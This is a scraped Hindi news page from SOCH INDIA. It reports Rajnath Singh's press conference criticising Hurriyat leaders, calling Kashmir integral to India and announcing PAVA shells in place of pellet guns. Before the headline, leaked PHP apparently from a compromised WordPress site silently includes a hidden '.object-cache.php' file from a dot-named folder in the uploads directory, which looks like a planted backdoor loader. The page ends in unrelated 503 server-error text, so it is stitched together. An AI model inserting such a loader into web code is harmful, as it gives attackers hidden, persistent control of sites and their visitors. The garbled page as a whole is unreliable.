add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); हुर्रियत नेताओं पर बरसे राजनाथ, कहा- बातचीत के लिए हमारे दरवाजे ही नहीं रोशनदान भी खुले – SOCH INDIA
Menu

राजनीति
हुर्रियत नेताओं पर बरसे राजनाथ, कहा- बातचीत के लिए हमारे दरवाजे ही नहीं रोशनदान भी खुले

nobanner

गृह मंत्री राजनाथ सिंह

गृह मंत्री राजनाथ सिंह ने कश्मीर में हुर्रियत नेताओं के अड़ि‍यल रवैये पर दो टूक टिप्पणी की है. सोमवार को प्रेस कॉन्फ्रेंस में सिंह ने कहा कि जिस तरह हुर्रियत नेताओं ने सर्वदलीय प्रतिनिधि‍मंडल से बातचीत से इनकार किया है, साफ जाहिर है कि उनके दिल में कश्मीरी आवाम के लिए न तो इंसानियत है और न ही कश्मीरियत.

राजनाथ सिंह ने इसके साथ ही कहा कि केंद्र और राज्य सरकारघाटी में शांति का माहौल तैयार करने के लिए हर संभव प्रयास कर रही है. उन्होंने कहा, ‘मैं हुर्रियत नेताओं से कहना चाहता हूं कि बातचीत के लिए हमारे दरवाजे ही नहीं, हमारे रोशनदान भी खुले हैं.

‘कश्मीर भारत का अभि‍न्न अंग था, है और रहेगा’
राजनाथ सिंह ने कहा, ‘हर कोई कश्मीर में हालात सुधारने के लिए चिंतित है. एक बात मैं तथ्यात्मक रूप से स्पष्ट कर दूं कि जम्मू-कश्मीर हिंदुस्तान का अभिन्न अंग था, भारत का अंग है और हमेशा रहेगा. इसमें कोई दोमत नहीं है. अगर कोई बातचीत के लिए जाता है और हुर्रियत के नेता बात नहीं करते हैं तो साफ जाहिर है कि उनका इंसानियत, जम्हूरियत और कश्मीरियत में कोई भरोसा नहीं है.’

‘शांति चाहने वालों से बातचीत को तैयार’
गृह मंत्री ने कहा, ‘हम घाटी में शांति बहाली के लिए हर संभव प्रयास करने के लिए तैयार हैं. हम राज्य सरकार के साथ हर कदम से कदम मिलाकर आगे बढ़ रहे हैं. हम शांति चाहने वालों से बात करने के लिए तैयार हैं.’

 ‘पहले घर के लोगों से होगी बात’
हुर्रियत नेताओं की ओर से कश्मीर मसले पर पहले पाकिस्तान से बातचीत की शर्त पर गृह मंत्री ने कहा, ‘हम पहले देश में रहने वाले अपने लोगों से बात करेंगे.’ गृह मंत्री ने बताया कि प्रदर्शनकारियों पर अब पैलेट गन की जगह पावा शेल का इस्‍तेमाल होगा. उन्होंने कहा कि कश्‍मीरी छात्रों की समस्‍याओं के लिए एक कमेटी बनाई गई है, जिसे डॉक्टर संजय राय हेड कर रहे हैं.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.